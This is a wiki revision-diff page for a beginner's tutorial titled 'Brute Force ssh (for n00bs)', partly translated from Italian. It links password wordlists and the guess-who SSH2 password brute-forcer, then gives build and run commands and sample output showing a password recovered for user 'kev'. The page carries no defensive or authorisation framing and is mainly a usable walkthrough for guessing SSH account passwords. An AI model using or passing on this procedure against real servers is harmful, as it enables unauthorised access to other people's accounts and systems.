Differenze per "BruteForce_ssh_eng"

Differenze tra le versioni 2 e 3

Brute Force ssh (for n00bs)

Required Files and programs

It is NOT required to download ALL files here. Please read CAREFULLY! BR

Choose 1 from the following: BR

attachment:all_merged.tar.gz	attachment:all_merged.zip	(~20MB! - 67MB uncompressed)	- Several passwords
attachment:common_merged.tar.gz	attachment:common_merged.zip	(~6.5MB - 18MB uncompressed)	- Selection of common passwords

Required Program: BR
- attachment:guess-who-0.44.tgz (16.1 KB) - Linux program to Brute Force SSH BR
In case you would want to personalize your password files, the folowing is a Wind0ws utility to merge text files BR
- attachment:uumerge.zip (55.1 KB) Wind0ws merging program BR
The following are to be chosen if you want to create personalized password files.
- attachment:common.tar.gz | attachment:common.zip (35 files - 6322.2 KB) - Several passwords not merged (~6MB) BR attachment:all.tar.gz | attachment:all.zip (46 files - 19130.5 KB) - Selection of common passwords not merged (~20MB!) BR

Procedure

Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts. BR It is available from http://packetstormsecurity.org/ BR BR Installation: BR Download to the desired directory BR

tar -zxvf guess-who-0.44.tgz
make

BR Execution: BR

[root@hacker guess-who]# ./b

guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer@cs.uni-potsdam.de

Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads] [-n ntries]
Use -1 for producer/consumer thread model, -2 for dumb parallelism. < Password file

Expected output: BR

[root@hacker guess-who]# ./b -l kev -h l192.168.1.1 -p 22 -2 < /passwords.txt
(!)056 ][ 00013 ][ 00000004.307361 ][ kev ][ arsenal ]
[ 00061 ][ 00015 ][ 00000004.066396 ][ kev ][ e3d ]

As you can see the user kev has a password of arsenal BR

-  ⇤ ← Versione 2 del 2007-03-31 12:09:04 → 
  Dimensione: 2107
  Autore: ac3bf1
  Commento:
+   ← Versione 3 del 2007-03-31 12:13:02 → ⇥
  Dimensione: 2060
  Autore: ac3bf1
  Commento:
-Le cancellazioni sono segnalate in questo modo.
+Le aggiunte sono segnalate in questo modo.
 Linea 13:
-   attachment:guess-who-0.44.tgz (16.1 KB) - Programmino Linux per svolgere il brute Forcing [[BR]]
 * In caso si voglia creare dei file con le password più personalizzati scaricare il seguente programma [[BR]]
   attachment:uumerge.zip (55.1 KB) - Programmino Wind0ws per fare il merge di file di testo [[BR]]
 * Archivi con le password in file separati
   attachment:common.tar.gz | attachment:common.zip (35 file - 6322.2 KB) - Archivio con diversi file di testo non uniti in un unico file'''(~6MB)'''  [[BR]]
   attachment:all.tar.gz | attachment:all.zip (46 file - 19130.5 KB) - Archivio con diversi file di testo non uniti in un unico file '''(~20MB!)''' [[BR]]
+   attachment:guess-who-0.44.tgz (16.1 KB) - Linux program to Brute Force SSH [[BR]]
 * In case you would want to personalize your password files, the folowing is a Wind0ws utility to merge text files [[BR]]
   attachment:uumerge.zip (55.1 KB) Wind0ws merging program [[BR]]
 * The following are to be chosen if you want to create personalized password files.
   attachment:common.tar.gz | attachment:common.zip (35 files - 6322.2 KB) - Several passwords not merged '''(~6MB)'''  [[BR]]
   attachment:all.tar.gz | attachment:all.zip (46 files - 19130.5 KB) - Selection of common passwords not merged '''(~20MB!)''' [[BR]]
 Linea 20:
-=== Procedura ===
+=== Procedure ===